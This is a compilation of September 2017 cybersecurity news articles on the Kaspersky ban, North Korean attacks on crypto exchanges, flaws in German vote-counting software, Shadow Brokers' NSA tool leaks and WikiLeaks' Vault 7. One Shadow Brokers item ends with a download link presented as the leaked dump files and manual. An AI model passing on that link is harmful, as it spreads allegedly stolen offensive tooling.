Kaspersky Lab recently announced plans to open three new regional offices in North America next year — one in Canada and two in the U.S.


Kaspersky Lab solutions banned from US government agencies
14.9.2017 securityaffairs BigBrothers

The US Department of Homeland security banned government agencies for using software products developed by Kaspersky Lab
Bad news for security firm Kaspersky, the US Department of Homeland security banned government agencies for using software products developed by Kaspersky Labs. The ban was the response to the concerns about possible ties between Kaspersky and Russian intelligence agencies.

According to The Washington Post, which first reported the news, the order applies to all civilian government networks, but not the military ones.

In July, the US General Services Administration announced that the security firm Kaspersky Lab was deleted from lists of approved vendors.

The US government banned Kaspersky solutions amid concerns over Russian state-sponsored hacking.

Now, Homeland Security has issued a Binding Operational Directive that orders agencies to remove products developed by Kaspersky Lab within 90 days.

IT managers have 30 days to assess their infrastructure to check for the presence of Kaspersky software and 60 days to develop a plan to remove it.

“The Department is concerned about the ties between certain Kaspersky officials and Russian intelligence and other government agencies, and requirements under Russian law that allow Russian intelligence agencies to request or compel assistance from Kaspersky and to intercept communications transiting Russian networks,” the agency said in a statement.

“The risk that the Russian government, whether acting on its own or in collaboration with Kaspersky, could capitalize on access provided by Kaspersky products to compromise federal information and information systems directly implicates U.S. national security.”

kaspersky lab CEO

A Kaspersky Lab spokesperson said in a statement that the company is disappointed in the DHS decision.

“No credible evidence has been presented publicly by anyone or any organization, as the accusations are based on false allegations and inaccurate assumptions, including claims about the impact of Russian regulations and policies on the company. Kaspersky Lab has never helped, nor will help, any government in the world with its cyberespionage or offensive cyber efforts, and it’s disconcerting that a private company can be considered guilty until proven innocent, due to geopolitical issues.” a spokesperson from Kaspersky told The Register.

It will provide all necessary info to demonstrate that “these allegations are completely unfounded.”

“Kaspersky Lab has always acknowledged that it provides appropriate products and services to governments around the world to protect those organizations from 2cyberthreats, but it does not have unethical ties or affiliations with any government, including Russia.” Kaspersky spokesman said.

“Kaspersky Lab has never helped, nor will help, any government in the world with its cyberespionage or offensive cyber efforts, and it’s disconcerting that a private company can be considered guilty until proven innocent, due to geopolitical issues.”

The company rejected any allegation and also clarified that Russian policies and laws are applied to telecoms and ISPs, not security firms like Kaspersky.

Senator Jeanne Shaheen (D-N.H.), who asked US Government for taking action against Kaspersky Lab in the past, praised the decision.

Follow
Sen. Jeanne Shaheen ✔@SenatorShaheen
Applaud DHS for heeding my call to remove all Kaspersky products from fed agencies. Kaspersky is a direct threat to national security

7:32 PM - Sep 13, 2017
32 32 Replies 149 149 Retweets 417 417 likes
Twitter Ads info and privacy
Recently the tech retailer Best Buy pulled Kaspersky products from its shelves and website


North Korean Hackers Targeting Crypto-Currency Exchanges: FireEye

12.9.2017 securityweek BigBrothers
Over the past several months, threat actors believed to have ties with North Korea have been targeting crypto-currency exchanges to obtain hard currencies for the Pyongyang regime, FireEye says.

The attacks, which FireEye has observed since May 2017, are said to be part of a campaign that started in 2016, when banks and the global financial system were hit. Given the impressive spike in value Bitcoin has seen since the beginning of the year, it’s no surprise that threat actors are interested in the potential crypto-currencies have.

Traditionally, North Korean actors have been engaging in activities typically associated with nation-state cyber espionage, but they started shifting focus to conduct cybercrime as of last year. Given the country’s position as a pariah nation that has been cut off from much of the global economy, as well as its tight control of its military and intelligence capabilities, this doesn’t come as a surprise.

North Korea Stealing Bitcoin via hacksAs such, the recently observed interest in crypto-currencies isn’t surprising either, and FireEye considers the recent attacks to be part of a larger campaign that started last year. Since May 2017, the security researchers have observed North Korean actors targeting at least three South Korean crypto-currency exchanges, supposedly in an attempt to steal funds.

The attacks, FireEye says, involved spear-phishing attacks that often targeted the personal email accounts of employees at digital currency exchanges. Tax-themed lures were frequently employed to trick users into installing malware such as PEACHPIT and similar variants, which have been previously linked to North Korean actors.

The spear-phishing attacks started in early May and targeted one crypto-currency exchange at a time. By early June, three South Korean exchanges were hit, along with various other, unknown victims, which the security researchers suggest might be crypto-currency service providers in South Korea.

“Add to that the ties between North Korean operators and a watering hole compromise of a Bitcoin news site in 2016, as well as at least one instance of usage of a surreptitious crypto-currency miner, and we begin to see a picture of North Korean interest in crypto-currencies, an asset class in which Bitcoin alone has increased over 400% since the beginning of this year,” FireEye notes.

Prior to these attacks, South Korean crypto-currency exchange Yapizon was compromised in April, but FireEye says that “at least some of the tactics, techniques, and procedures” reportedly employed during this incident were different, and there are no clear indications of North Korean involvement.

At the end of April, however, the United States announced a strategy of increased economic sanctions against North Korea, and the subsequent attacks on South Korean exchanges might be the result of this announcement. A July attack on Bithumb might also be the result of North Korea’s increased interest in Bitcoin, a report published last month revealed.

The targeting of Bitcoin and crypto-currency exchanges fits with the previously observed North Korean actors’ interest in conducting financial crime on the regime’s behalf. By compromising a crypto-currency exchange, the actors can move crypto-currencies out of online wallets, swap them for more anonymous ones, and even “send them directly to other wallets on different exchanges to withdraw them in fiat currencies such as South Korean won, US dollars, or Chinese renminbi,” FireEye notes.

“As the regulatory environment around cryptocurrencies is still emerging, some exchanges in different jurisdictions may have lax anti-money laundering controls easing this process and make the exchanges an attractive tactic for anyone seeking hard currency,” the researchers continue.

Nation states are starting to take notice of the potential presented by Bitcoin and other crypto-currencies, given their recent increase in value. Thus, this emerging asset class is becoming a “target of interest by a regime that operates in many ways like a criminal enterprise,” FireEye notes, adding that other rising cyber powers might follow a similar path.

“Cyber criminals may no longer be the only nefarious actors in this space,” the researchers conclude.

Just last night, the UN Security Council voted unanimously to adopt new sanctions on North Korea, including restrictions on oil shipments, banning import and export of textiles, and barring countries from issuing new work permits to North Koreans working abroad.


Proof It's Possible to Hack German Elections; Hackers Tamper with Voting-Software
10.9.2017 thehackernews BigBrothers

Germany's democracy is in danger, as the upcoming federal elections in the country, where nearly 61.5 million citizens are going to vote on September 24th, could be hijacked.
Hackers have disclosed how to hack the German voting software to tamper with votes and alter the outcome of an election.
Yes, election hacking is no theory—it is happening.
A team of researchers from German hacking group Chaos Computer Club (CCC) has discovered several critical vulnerabilities in PC-Wahl—software used to capture, tabulate and transfer the votes from local polling centres to the state level during all parliamentary elections for decades.
According to the CCC analysis, vulnerabilities could lead to multiple practicable attack scenarios that eventually allow malicious agents in the electoral office to change total vote counts.
Critical Flaws Found In German Voting-Software
The hacker collective found that the automatic software update module of PC-Wahl downloads packages over insecure HTTP connection and does not perform any integrity check using digital signatures.
Moreover, the software uses an older encryption method with a single secret key hard-coded in the software, rather than asymmetrical encryption that offers better security by design.
The Software includes an FTP module that sends the voting results to a central password-protected FTP server, but the researchers believe the password for data sharing has been shared among electoral staff.
"The same access data has always been used for various polling stations and constituencies in Hesse for many years so that an attacker has been able to manipulate the results of all municipalities simultaneously and centrally," the research paper [PDF] (translated) reads.
The group has published the proof-of-concept attack tools against the PC-Wahl software with source codes on GitHub.
Software Company Denied Vulnerability Report
According to the German Spiegel magazine, the manufacturer of PC-Wahl had denied the allegations that its software was vulnerable to cyber attacks.
The CCC hacking collective has urged the German government and election commission to take necessary actions to tackle the issues in the election software in order to protect the September 24 election that the group fear could be subject to interference.
In response, German Federal Election Director Dieter Sarreither said he was familiar with the issues discovered by the CCC and had asked state officials and the software company to take necessary steps to address them, Reuters reported.
German federal cyber protection agency, BSI, said the agency had worked closely with election officials and the software manufacturer to improve the security of election results.
"In the future, only information technology based on BSI-certified software should be used for election processes," says BSI chief Arne Schoenbohm.
Hacking voting machine is not a new thing. Two months ago, several hackers managed to hack into multiple US voting machines in a short period—in some cases, within minutes—at Def Con.
Election hacking has become a major debate following the 2016 US presidential election, where it was reported that Russian hackers managed to access United States voting machines in 39 states in the run-up to the election. However, there is no evidence yet to justify the claims.


Shadow Brokers Leaks Another Windows Hacking Tool Stolen from NSA’s Arsenal
10.9.2017 thehackernews BigBrothers

The Shadow Brokers, a notorious hacking group that leaked several hacking tools from the NSA, is once again making headlines for releasing another NSA exploit—but only to its "monthly dump service" subscribers.
Dubbed UNITEDRAKE, the implant is a "fully extensible remote collection system" that comes with a number of "plug-ins," enabling attackers to remotely take full control over targeted Windows computers.
In its latest post, the hacking group announced a few changes to its monthly dump service and released encrypted files from the previous months as well.
Notably, the September dump also includes an unencrypted PDF file, which is a user manual for the UNITEDRAKE (United Rake) exploit developed by the NSA.
According to the leaked user manual, UNITEDRAKE is a customizable modular malware with the ability to capture webcam and microphone output, log keystrokes, access external drives and more in order to spy on its targets.

The tool consists of five components—server (a Listening Post), the system management interface (SMI), the database (to store and manage stolen information), the plug-in modules (allow the system capabilities to be extended), and the client (the implant).
Snowden Leak Also Mentions UNITEDRAKE

UNITEDRAKE initially came to light in 2014 as a part of NSA's classified documents leaked by its former contractor Edward Snowden.
The Snowden documents suggested the agency used the tool alongside other pieces of malware, including CAPTIVATEDAUDIENCE, GUMFISH, FOGGYBOTTOM, GROK, and SALVAGERABBIT, to infect millions of computers around the world.
CAPTIVATEDAUDIENCE is for recording conversations via the infected computer's microphone
GUMFISH is for covertly taking control over a computer’s webcam and snap photographs
FOGGYBOTTOM for exfiltrating Internet data like browsing histories, login details and passwords
GROK is a Keylogger Trojan for capturing keystrokes.
SALVAGERABBIT is for accessing data on removable flash drives that connect to the infected computer.
New Terms for Shadow Brokers Monthly Dump Service
The Shadow Brokers is now only accepting payments in ZCash (ZEC) from its monthly subscribers, rather than Monero since it uses clear text email for delivery, and has also raised the rates for exploits, demanding nearly $4 Million.
The group demanded 100 ZEC when it started its first monthly dump service in June, but now the hackers are demanding 16,000 ZEC (which costs $3,914,080 in total) for all NSA dumps. Zcash currently trades at $248 per unit.
Those who want to gain access only to the September dump that includes the new NSA malware files need to pay hackers 500 ZEC.
The Shadow Brokers gained popularity after leaking the SMB zero-day exploit, called Eternalblue, that powered Wannacry ransomware attack that crippled large businesses and services around the world in May.
After that, the mysterious hacking group announced a monthly data dump service for those who want to get exclusive access to the NSA arsenal, which they claim to have stolen from the agency last year.


Hacker Who Hacked US Spy Chief, FBI & CIA Director Gets 5-Year in Prison
10.9.2017 thehackernews BigBrothers

Remember "Crackas With Attitude"?
The hacking group behind a series of embarrassing hacks that targeted personal email accounts of senior officials at the FBI, the CIA, and the White House, among other United States federal agencies in 2015.
A member of Crackas With Attitude, who was arrested last year in September, has now been sentenced to five years in federal prison.
Justin Liverman, a 25-year-old man from Morehead City, who was known under the online alias "D3F4ULT," was arrested last year along with another member of the group—Andrew Otto Boggs, 23, of North Wilkesboro, who allegedly used the handle "INCURSIO."
The duo hacked into multiple government organizations between October 2015 and February 2016. Boggs was sentenced to two years in prison on June 30, 2017, for his role.
Liverman pleaded guilty on January 6 this year to conspiracy to hack U.S. government computers and accounts and was sentenced to 5 years in prison on Friday. He will also be forced to pay $145,000 in restitution.
According to the plea agreement, "beginning in November 2015, Liverman conspired to attempt to intimidate and harass U.S. officials and their families by gaining unauthorized access to victims’ online accounts, among other things."
"Liverman publicly posted online documents and personal information unlawfully obtained from a victim's personal account; sent threatening text messages to the same victim's cellphone; and paid an unlawful 'phonebombing' service to call the victim repeatedly with a threatening message," U.S. prosecutors in the Eastern District Court of Virginia said.
Crackas With Attitude targeted more than ten U.S. government officials including the following and caused more than $1.5 million in losses to victims:
Hacked into the AOL email of former CIA director John Brennan and released personal details.
Hacked into the personal emails and phone accounts of the former US spy chief James Clapper.
Broke into the AOL email of the Ex FBI Deputy Director Mark Giuliano.
The hacking group also leaked the personal details of 31,000 government agents belonging to almost 20,000 FBI agents, 9,000 Department of Homeland Security officers, and some number of DoJ staffers.
According to the federal officials, the hacking group used social engineering to trick victims into revealing their account numbers, passwords, and other sensitive details, using which they gained access to their accounts.
However, a 17-year-old British teenager, who is known as CRACKA and the leader of the "Crackas With Attitude" hacking group, is actually responsible for carrying out the above attacks. His prosecution is still ongoing in the United Kingdom.


PC-Wahl software used in Germany for vote counting lack of security
8.9.2017 securityaffairs BigBrothers

The European biggest hacker collective Chaos Computer Club demonstrated that PC-Wahl software used in Germany for vote counting is insecure.
According to a study conducted by the hacker collective Chaos Computer Club (CCC), the software used in Germany for vote counting is insecure.

The experts have found several vulnerabilities in the voting software adopted by the German Government. The results of the research were released Chaos Computer Club (CCC) a few weeks before the upcoming election of the members of the Bundestag.

Chaos Computer Club hacked voting sw PC-Wahl

On September 24, German citizens will elect their representatives to the German Parliament.

The application used to tabulate votes, PC-Wahl software package, could be hacked. The PC-Wahl software package is used to capture, aggregate and tabulate the votes during elections and experts discovered it is affected by many vulnerabilities.

“Hackers of the Chaos Computer Club (CCC) have studied a software package used in many German states to capture, aggregate and tabulate the votes during elections, to see if this software was secure against external attack. The analysis showed a number of security problems and multiple practicable attack scenarios.” reads the blog post published by the CCC. “Some of these scenarios allow for the changing of vote totals across electoral district and state boundaries. „PC-Wahl“, the software in question, has been used to record, analyse and present election data in national, state and municipal elections for multiple decades.”

White-hat hackers reported that the broken software update mechanism of PC-Wahl allows for one-click compromise, considering that the update server lack security, an attacker can takeover it.

The attack scenario is described as trivial and ill-intentioned could easily target the voting process. The PC-Wahl has been used in any kind of in Germany for many years.

“Elementary principles of IT security were not heeded,” explained Linus Neumann, a CCC spokesman who participated in the study. “The amount of vulnerabilities and their severity exceeded our worst expectations.”

According to CCC, the state of Hesse is investigating every transmission made using the flawed software.

The CCC has released proof-of-concept attack tools with source code to demonstrate the vulnerabilities and to force authorities to take necessary actions.

“The primary goal of the CCC security analysis was to raise any security problems found with the authorities, reminding them of their responsibilities” continues the CCC.

“A brute manipulation of election results should be harder now because of the raised awareness and changed procedures.”

Hacking of electronic voting systems has been discussed often in the last months especially after allegations that the Russian APTs interfered with US Presidential election.

In a public hearing into the Russian interference in the 2016 Presidential election held by the US Senate Intelligence Committee, the Department of Homeland Security director of the cyber division, Dr Samuel Liles, claimed that the electoral networks in 21 US states were probed by hackers a month before the election. The systems in a few of states were hacked.

The Department of Homeland Security director avoided disclosing the name of the US states. Russian hackers tried to exploit software vulnerabilities in the target systems by using a number of publicly known exploits.

The hackers aimed to get access into election registration and management systems, but not the vote-tallying equipment.


EU Defense Ministers Put to Test in Mock Cyberattack

8.9.2017 securityweek BigBrothers
A major cyberattack targets European Union military structures, with hackers using social media and "fake news" to spread confusion, and governments are left scrambling to respond as the crisis escalates.

This was the scenario facing a gathering of EU defence ministers in Tallinn on Thursday as they undertook a exercise simulating a cyber assault on the bloc -- the first mock drill of its kind at such a senior level in Europe.

With countries around the world heavily reliant on computers for everything from defence systems to hospital equipment to critical infrastructure such as power stations, the cybersphere is seen as the next major theatre for conflict.

NATO now considers cyberspace to be a conflict domain alongside that of air, sea and land.

Alliance chief Jens Stoltenberg, who attended the exercise in Tallinn, said NATO had seen a 60 percent increase in cyber attacks on its networks over the last year.

In Tuesday's exercise, the 28 EU defence ministers were presented with an escalating crisis during an operation in the Mediterranean Sea similar to the current Sophia naval mission against people-smuggling networks.

"First a drone went down after a problem with the server at the military headquarters, then another drone was intercepted and then a more serious threat with a worm (computer virus)... and then more serious still with the loss of communications with our ships in the Mediterranean," Belgian Defence Minister Steven Vandeput explained.

The ministers were given tablet computers to answer multiple choice questions about how to respond to each fresh development.

"We are not creating programmers from the ministers but we want them to understand that these quickly developing situations could demand quick political decisions -- that's the idea of the exercise," Estonian Defence Minister Juri Luik said.

- 'Exciting' exercise -

Estonian officials said the aim was to improve ministers' understanding of the kinds of target that could be hit by a cyberattack, the effects such an attack could have and how they could respond -- as well as the need for clear, coordinated communication with the public on what can be a complex issue.

German Defence Minister Ursula von der Leyen said the two-hour exercise was "extremely exciting".

"The adversary is very, very difficult to identify. The attack is silent, invisible... it is cost-effective for the adversary because he does not need an army, but only a computer with internet connection," she said.

Estonia has made digital issues one of the priorities of its EU presidency, which runs until the end of this year, and Thursday's exercise was over a year in the planning.

Leyen said the drill showed the importance of "informing each other and to include the economy in case a major cyber attack spreads in critical infrastructure of the EU economy".

- Russian threat -

The devastating WannaCry ransomware attack that hit more than 200,000 users around the world in May, causing chaos in Britain's National Health Service and halting production at numerous factories, was a stark signal of hackers' power to wreak havoc.

But NATO and the EU are also on their guard against Russia deploying so-called hybrid tactics -- combining cyber warfare and misinformation as well as conventional boots on the ground -- as it did in Crimea to destabilise and ultimately annex a region.

In the last couple of years Lithuania and Latvia have warned they were coming under hybrid attack, accusing Moscow of waging a propaganda campaign to sow dissatisfaction among ethnic Russians in their territory.

Estonia itself was hit as far back as 2007 by one of the first major cyberattacks, suffering a blistering assault on official state and bank websites. The onslaught was blamed on Russian hackers, though the Kremlin denied involvement.

While getting ministers to think of cybersecurity at a strategic level was the key aim of Thursday's practice, Estonian officials stressed that proper resilience to hacking requires education across the whole population.

The vast majority of hacking attacks begin with a security breach from human action -- someone opening an email attachment or clicking a link that lets a virus infect their computer network.

Tanel Sepp, a senior cyber expert at the Estonian defence ministry, said children should be taught the priniciples of online safety in the same way they are taught to cross the road safely.


Is the Trump Administration Serious About Cybersecurity?

8.9.2017 securityweek BigBrothers

National Infrastructure Advisory Council (NIAC) Contains No Recognizable Cybersecurity Luminaries

In August, eight out of 28 members of President Trump's National Infrastructure Advisory Council (NIAC) resigned -- seven en masse on the day before publication of the council's draft report 'Addressing Urgent Cyber Threats to Critical Infrastructure', and an eighth at the end of the same week. These resignations beg an important question: what do the president's own advisors think of his approach to the security of America's critical infrastructure?

A resignation letter from the former NIAC members gives some clues: "Your actions have threatened the security of the homeland I took an oath to protect... You have given insufficient attention to the growing threats to the cybersecurity of the critical systems upon which all Americans depend, including those impacting the systems supporting our democratic election process."

The draft report published the following day, but clearly not endorsed by the resignees, provides further clues. Sqrrl director Matt Zanderigo had two major issues with it. Firstl, the majority of recommendations are not new; and second, the recommendations are voluntary. Most security experts do not believe that voluntary proposals work -- they need to be enforced. Business leaders, however, tend to like proposals to be voluntary because they can be implemented, or not, with the minimum disruption to the business.

It is noticeable that the vast majority of the remaining members of the council are business leaders (many of them former business leaders). While the president's former Strategic and Policy Forum (a business advisory panel) included business luminaries such as Elon Musk and Disney's Robert Iger, and CEOs from JPMorgan Chase, Merck, Uber, Intel, and the Blackstone Group (all of whom resigned), NIAC contains no such immediately recognizable cybersecurity luminaries.

The question, then, is does President Trump actually understand cybersecurity issues, and is he serious about tackling them?

Opinions among security practitioners vary. Dana Simberkoff, chief risk, privacy and information security officer at AvePoint, wonders if it is ever possible to do enough to please everyone. "I think it's fair to say that no one country, company or industry can or will ever do "enough" to protect against cyberattacks," she told SecurityWeek. "Just as there is no such thing as perfect security, there will never be a strong enough cyber defense to withstand all potential attackers."

"Let's be clear," says Chris Roberts, chief security architect at Acalvio. "The resignations were not just about the state of critical infrastructure security. They were in response to a number of issues and were probably partially motivated by the fact a lot of people are assessing the impact of being with President Trump vs. sitting on the sidelines watching this whole mess unfold."

But he doesn't think that's the whole answer. "There is a huge concern in the community (both the NIAC and Energy/Natural Resource Committee to name a couple) have called into question the awareness and level of attentiveness demonstrated by the current administration when it comes to all things technical."

The concern seems to be, not that the administration is incapable of doing things -- Trump signed a new cybersecurity executive order in May, and raised USCYBERCOM to the status of a unified combatant command last month -- but that it fails to adequately follow up on them. "Signing something and then paying attention to it afterwards seem to be two very separate things. A lot of criticism has been leveled at him based on his lack of response on multiple occasions with regards to actually doing anything when it comes to securing our infrastructure, sorting out who did vote for him and other issues."

Andrew McDonnell, president at AsTech, has a similar view. For him, the problem is the very nature of NIAC. "From an information security perspective," he told SecurityWeek, "the federal government is continuing its track record of assigning accountability to leadership positions and groups without granting authority or leveling consequences to drive meaningful progress. While supporting decisive action is by no means trivial, it is an essential next step to clearly identifying and mitigating vulnerabilities that -- if exploited -- could lead to massive material harm."

The problem with NIAC and the administration is less that it doesn't know what to do -- nearly everybody associated with cybersecurity knows what needs to be done -- it is that it simply isn't providing the means to make sure that it gets done. At the same time, this lack of action from the administration must not be taken as an excuse for a lack of action among practitioners.

"Let's face it," says Roberts: "the boss is not paying attention, so we can either sit and complain about it all day or we can just get our heads down and fix things. That seems to be the problem. We want someone to tell us what to do, but we know what needs to happen and we know that defaults, passwords, segmentation and a host of other things have to be done. So why the hell don't we just bloody fix it and let the boss wander around doing nothing, as normal? We know what has/should be done to get things fixed so why are we waiting for someone to tell us what needs to happen? Oh, someone has to force us to collaborate? That's bullshit. Someone has to force us to prioritize? Again, BS. We know what needs to be done... just do it."


Wikileaks Unveils Project Protego: CIA's Secret Missile Control System
7.9.2017 thehackernews BigBrothers

Every week since March Wikileaks has been leaking secrets from the United States Central Intelligence Agency (CIA), which mainly focus on surveillance techniques and hacking tools employed by its agents.
However this time, the whistleblower organisation has released something different from its previous Vault 7 leaks, because it's not about hacking and spying; instead, it's a—Missile Control System.
Dubbed Project Protego, the PIC-based missile control system is installed on-board a Pratt and Whitney Aircraft (PWA) equipped with missile launch system, which gives it ability to hit air-to-air and air-to-ground targets.
The latest leak contains four secret documents in total from the project Protego, along with "37 related documents (proprietary hardware/software manuals from Microchip Technology Inc)," WikiLeaks says.

Leaked documents reveal system design, a guide on how to configure and build Protego images, and also suggest that all micro-controller units exchange data and signals over encrypted and authenticated channels.
"The missile system has micro-controllers for the missile itself ('Missile Smart Switch', MSS), the tube ('Tube Smart Switch', TSS) and the collar (which holds the missile before and at launch time)."
The missile launches only when the Master Processor (MP) unit receives three valid signals from a beacon, including 'In Border,' 'Valid GPS,' and 'No End of Operational Period.'
WikiLeaks is not sure why the secret documents of project Protego were the part of repositories that belongs to the CIA's Engineering Development Group, who are apparently known for developing malware and hacking tools for the agency.
However, notably, the CIA has developed Protego missile control system in partnership with one of a major U.S. defence contractor, Raytheon, who was also mentioned in a previous CIA leak.
Raytheon is the same company that the agency hired for analysing advanced malware and hacking techniques being used in the wild by hackers and cyber criminals.
It seems the name, Protego, has been inspired from the magical Shield Charm used in Harry Potter movies, which helped from physical attacks as wells as magical.
If so, then the primary objective of this missile control system could be to defend something (secret facility or base), from external physical attacks.
Previous Vault 7 Leaks
Last week, WikiLeaks published another CIA project, dubbed AngelFire, which is an implant developed by the agency to implant a persistent backdoor on the target Windows computers by modifying their partition boot sector.
Since March, WikiLeaks has published 23 batches of "Vault 7" series, which includes the latest and last week leaks, along with the following batches:
ExpressLane — detailed about the spying software that the agency used to spy on their intelligence partners around the world, including the FBI, DHS and NSA.
CouchPotato — A CIA project that revealed its ability to spy on video streams remotely in real-time.
Dumbo — A CIA project that revealed the CIA's ability to hijack and manipulate microphones and webcams to corrupt or delete recordings.
Imperial — A CIA project that disclosed details of at least 3 CIA-developed hacking tools and implants designed to target computers which run Apple Mac OS X and different flavours of Linux OS.
UCL/Raytheon — A CIA contractor, which analysed in-the-wild advanced malware and hacking tools for help the agency develop its own malware.
Highrise — An alleged CIA project that let the spying agency stealthy collect and send stolen data from compromised smartphones to its server through SMSs.
BothanSpy and Gyrfalcon — Two implants that allowed the CIA agents to intercept and exfiltrate SSH credentials from targeted Windows and Linux systems using different attack vectors.
OutlawCountry — An alleged CIA project that let the spying agency hack and remotely spy on PCs running Linux OS.
ELSA — Alleged CIA malware that allows the agency to track geolocation of targeted laptops and PCs running the Microsoft Windows OS.
Brutal Kangaroo — An alleged tool suite for Microsoft Windows operating system used by the CIA agents to target air-gap computers within an organisation or enterprise without needing any direct access.
Cherry Blossom — A framework employed by the CIA to monitor the Internet activity of the targeted systems by exploiting vulnerabilities in Wi-Fi devices.
Pandemic — A CIA project that allowed the US intelligence agency to turn Windows file servers into covert attack machines that can silently infect other systems inside the same network.
Athena — A framework that the agency designed to remotely spy and take full control of the infected Windows systems and works on every version of Windows OS—from Windows XP to Windows 10.
AfterMidnight and Assassin — Two alleged CIA malware frameworks for Microsoft Windows that's designed to monitor and report back actions on the infected remote host PC and execute malicious tasks.
Archimedes — Man-in-the-middle attack tool allegedly developed by the spying agency to target PCs inside a Local Area Network (LAN).
Scribbles — Software allegedly designed to embed 'web beacons' into confidential documents, making the CIA agents able to track insiders and whistleblowers.
Grasshopper — A framework which let the spying agency easily create custom malware for breaking into Windows operating system and bypassing antivirus protection.
Marble — Source code of a secret anti-forensic tool used by the spying agency to hide the actual source of its malware.
Dark Matter — Several hacking exploits the spying agency designed to target iPhones and Macs.
Weeping Angel — A spying tool used by the intel agency to infiltrate smart TV's and transform them into covert microphones.
Year Zero — CIA hacking exploits for popular hardware as well as software.


Shadow Brokers Release Tool Used by NSA to Hack PCs

7.9.2017 securityweek  BigBrothers
The hacker group calling itself Shadow Brokers continues to release tools and exploits allegedly stolen from the U.S. National Security Agency (NSA), including a sophisticated espionage platform that can be used to take full control of targeted computers.

In the past year, Shadow Brokers has apparently tried to make a significant amount of money by offering to sell various tools and exploits used by the Equation Group, a cyber espionage actor linked by researchers to the NSA.

After several failed attempts, the Shadow Brokers’ latest offer involves monthly leaks for which interested parties have to pay a fee ranging between 100 Zcash (roughly $24,000) and 16,000 Zcash (roughly $3.8 million) -- older dumps can be acquired for a few hundred Zcash while the price of future dumps will increase exponentially. An analysis of their cryptocurrency addresses showed that the hackers have made at least tens of thousands of dollars from the monthly dump service.

With the September release, announced on Wednesday, Shadow Brokers informed interested entities that they will offer two dumps every month, and that Monero digital currency is no longer accepted.

While the content of each leak is not disclosed, one of the files made available for free this month, a user manual, suggests that last month’s dump included an NSA tool known as UNITEDRAKE.

UNITEDRAKE is a modular platform that allows users to take complete control of a Windows machine. It was one of the tools mentioned by The Intercept in 2014 when it started releasing files from NSA whistleblower Edward Snowden.

The tool was also detailed in February 2015 by Kaspersky Lab in the first report to link tools detailed in Snowden documents to a cyberespionage group, namely the Equation Group.

Kaspersky tracked UNITEDRAKE as EquationDrug, whose successor was GrayFish. The security firm said EquationDrug and GrayFish were used between 2003 and 2014, and described them as the most sophisticated espionage platforms used by the Equation Group.

6 Sep
Nicholas Weaver ✔ @ncweaver
Probably because their yanking of the NSA's chain is a lot easier with pre seeded files so they can dump PW later. https://twitter.com/josephfcox/status/905332685081587713 …
Follow
Nicholas Weaver ✔@ncweaver
In particular, dumping UNITEDRAKE would be interesting: Might end up outing major NSA operations by enabling attribution.
1:18 PM - Sep 6, 2017
Replies 5 5 Retweets 10 10 likes
Twitter Ads info and privacy

Some pointed out that screenshots included in the UNITEDRAKE manual appear to show that the NSA had used McAfee antivirus based on the presence of the McAfee agent icon in the taskbar. However, it’s worth pointing out that, for several years, a limited version of the McAfee antivirus was installed alongside Adobe Flash Player if users neglected to untick a box during installation.

The Shadow Brokers claim this month’s dump contains exploits, but experts doubt too many people are willing to pay the increasingly significant amounts of money, especially since at least one previous subscriber complained that they only received a worthless tool after paying tens of thousands of dollars.

6 Sep
Jake Williams @MalwareJake
Replying to @MalwareJake
Maybe I'm wrong, but I don't see people shelling out mad cash for files that history has shown they'll release the password to eventually.
Follow
Jake Williams @MalwareJake
16000 ZEC at today's rate is $3.8 million. That's just stupid. Nobody is paying that for unknown tools/data. pic.twitter.com/4wbMYv9G7C

2 2 Replies 7 7 Retweets 12 12 likes
Twitter Ads info and privacy

A group of researchers did try to launch a crowdfunding initiative back in May in an effort to raise money for the monthly dumps, but they ended up canceling the project due to legal reasons.


ShadowBrokers are back demanding nearly $4m and offering 2 dumps per month
6.9.2017 securityaffairs BigBrothers

The dreaded hacking group ShadowBrokers posted a new message, promising to deliver two data dumps a month as part its monthly dumps.
The notorious group ShadowBrokers is back with announcing new interesting changes to their Dump Service.

The hackers published a new message on the Steemit platform announcing new changed to their service.

“Missing theshadowbrokers? If someone is paying then theshadowbrokers is playing.”

The hacker group made headlines in April after publicly leaking exploits allegedly stolen from the NSA-Linked group Equation Group.

The changes for the Dump Service included 2 dumps per month and the possibility to pay only with ZCash cryptocurrency:

Two dumps per month
Zcash only, no Monero, delivery email in encrypted memo field
Delivery email address clearnet only, recommend tutanota or protonmail, no need exchange secret, no i2p, no bitmessage, no zeronet
Previous dumps now available, send correct amount to correct ZEC address
September dumps is being exploit
Below the “price list” shared by the group, it includes old dumps and future dumps, from June 30 until November 15.

ShadowBrokers dump

The amount of money requested by ShadowBrokers is substantially increased compared to the initial demand of 100 ZEC (~24k USD) in June, when the hackers started their first monthly dump service. Now, the hackers are offering the exploits for 16,000 ZEC, which amounts to $3,914,080.

ShadowBrokers leaked the manual for the NSA exploit dubbed UNITEDRAKE, it is one of the implants used by the NSA’s elite hacking unit TAO (Tailored Access Operations).

10h
Joseph Cox @josephfcox
Replying to @josephfcox
(Typo: United Rake)
Follow
Joseph Cox @josephfcox
Here's UNITED RAKE (Windows tool) from the Shadow Brokers dump mentioned in a Snowden document https://search.edwardsnowden.com/search?codewords_facet=UNITEDRAKE … pic.twitter.com/Drljghk9Ka
9:55 AM - Sep 6, 2017

1 1 Reply 4 4 Retweets 6 6 likes
Twitter Ads info and privacy
According to the leaked manual, UNITEDRAKE implant is a “fully extensible remote collection system designed for Windows targets”.

Follow
Rickey Gevers @UID_
BREAK! #ShadowBrokers just leaked the manual for #UNITEDRAKE http://docdro.id/iJbxyYx
10:32 AM - Sep 6, 2017
Photo published for manual_to_august_dump.pdf
manual_to_august_dump.pdf
Contact Software, Inc. Accelerated Development Team. UNITEDRAK E Manual. ...
docdroid.net
Replies Retweets likes
Twitter Ads info and privacy
Follow
Rickey Gevers @UID_
Turns out Kaspersky had a post about UNITEDRAKE dated March 11th 2015. They called UNITEDRAKE EquationDrug. https://securelist.com/inside-the-equationdrug-espionage-platform/69203/ …
10:49 AM - Sep 6, 2017
Photo published for Inside the EquationDrug Espionage Platform
Inside the EquationDrug Espionage Platform
EquationDrug represents the main espionage platform from the Equation Group. It’s been in use for over 10 years, replacing EquationLaser until it was itself replaced itself by the even more sophist...
securelist.com
Replies Retweets 1 1 like
Twitter Ads info and privacy
Files, Signed Message, Manual to August Dump:

https://mega.nz/#F!QGAyVTJL!0cJlvWpQ4dPcKLu-oN766w


Hackers Target Control Systems in U.S. Energy Firms: Symantec

6.9.2017 securityweek BigBrothers
A group of cyberspies believed to be operating out of Russia has been observed targeting energy facilities in the United States and other countries, and the attackers appear to be increasingly interested in gaining access to the control systems housed by these organizations.

